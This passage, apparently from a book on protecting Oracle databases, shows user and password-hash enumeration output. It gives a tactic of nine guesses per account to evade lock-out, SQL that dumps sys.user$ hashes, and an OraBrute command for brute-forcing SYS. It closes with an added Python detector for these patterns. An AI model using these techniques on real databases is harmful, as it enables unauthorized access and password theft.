TES CB698D7499C02CC7
DBMS_AUD F8206D829322277F
GONG BE18F734A58CB2DF
WATCHER_USER CD2419F94C27BAB6
TEST1 22F2E341BF4B8764
TESTER FC3B58FEE5B77260
MCA 1BE2EC8102224C41
_NEXT_USER
UM 71D1970E8FE9B6C6
UMTEST 321B7FDC90E12193
Finished: (1) users found. (1 secs)
No Oracle listener at 192.168.1.34
No Oracle listener at 192.168.1.35
...output snipped.
In this case, orapwshort.csv is a list of common Oracle username/password combinations. The password hashes
above can then be fed into a password cracker, as demonstrated in Chapter 10.
It should be noted that most databases will have a lock-out policy of ten attempts on each account, so a common
strategy is to try nine combinations for each account and then move on to the next. It may take a large number of
accounts and servers to find a weak account, but there is usually one, and it will commonly be on a development machine.
The skill then is to pivot from that machine to others, using the information and trusts that can be garnered from the
development machine and that also exist on the target production machines. That pivot process would normally be a case
of running a password cracker against the hashes above. Please see Part III for advanced Oracle password cracking.
The previous code can easily be modified to pull back the results of whatever SQL you like by editing this
line in oralogonsid.pl:
$sth = $dbh->prepare( "SELECT name, password from sys.user\$" );
Additional Protection
My previous Oracle Forensics book has more detail about penetration testing Oracle databases, but this topic is meant
to be more about protecting Oracle, so I won't duplicate that material here. What I will say is that it is still possible to
break into most Oracle databases due to the lack of SYS password account control. SYS is one of the few accounts we
know will be there; it has no locking, no way to enforce or check password complexity, and, prior to 12.1, no failed logon
delay. Therefore, this code will remotely brute-force into most Oracle databases, including the EM12c repository.
OraBrute invocation: orabrute <hostip> <port> <sid> <millitimewait>
e.g. c:\>orabrute 10.1.1.166 1522 orcl 100
When OraBrute creates a file called thepasswordsare.txt, the SYS account password has been
cracked. This program requires the Oracle client, the compiled C code below, the password.txt
password list, and selectpassword.sql, which contains the following SQL:
--selectpassword.sql:
spool thepasswordsare.txt
select name, password from sys.user$;
/
spool off
exit
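
Both behaviours described above leave a pattern in failed-logon records: nine guesses per account to stay under a ten-attempt lock-out, and unlimited guesses against SYS because it never locks. The following is an added detection example, not code from the book or from OraBrute; it assumes failed logons (including those for SYS) have been exported to CSV from whatever audit trail is in use, and the column names, host names and sample rows are constructed for illustration.

```python
import csv
import io
from collections import defaultdict

LOCKOUT_THRESHOLD = 10  # the ten-attempt lock-out policy described in the text
ORA_01017 = 1017        # return code for "invalid username/password; logon denied"


def sample_audit():
    """Constructed records (not real audit data); the column names are assumed."""
    rows = ["timestamp,userhost,username,returncode"]
    for acct in ("SCOTT", "DBSNMP", "TEST1"):  # nine failures per account
        rows += [f"2024-01-01T02:00:{i:02d},ws-17,{acct},1017" for i in range(9)]
    rows += [f"2024-01-01T03:{i:02d}:00,ws-23,SYS,1017" for i in range(40)]
    rows += ["2024-01-01T09:00:00,app-01,APPUSER,1017",  # one ordinary typo
             "2024-01-01T09:00:05,app-01,APPUSER,0"]
    return "\n".join(rows)


def analyse(audit_csv, threshold=LOCKOUT_THRESHOLD, min_accounts=3):
    """Return (finding, source host, detail) tuples from failed-logon records."""
    fails = defaultdict(lambda: defaultdict(int))  # host -> account -> failures
    for rec in csv.DictReader(io.StringIO(audit_csv)):
        if int(rec["returncode"]) == ORA_01017:
            fails[rec["userhost"]][rec["username"].upper()] += 1
    findings = []
    for host, per_acct in sorted(fails.items()):
        # Several accounts from one source, each with many failures but none
        # reaching the lock-out threshold: guessing paced to avoid locking.
        near = sorted(a for a, n in per_acct.items()
                      if threshold // 2 <= n < threshold)
        if len(near) >= min_accounts:
            findings.append(("under-lockout-spray", host, near))
        # SYS does not lock, so no lock-out event will ever appear for it;
        # the failure count itself is the signal.
        if per_acct.get("SYS", 0) >= threshold:
            findings.append(("sys-bruteforce", host, per_acct["SYS"]))
    return findings


if __name__ == "__main__":
    for finding in analyse(sample_audit()):
        print(finding)
```

Because the guessing is spread over many accounts and servers, counting per source host rather than per account is what makes the under-threshold pattern visible.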
 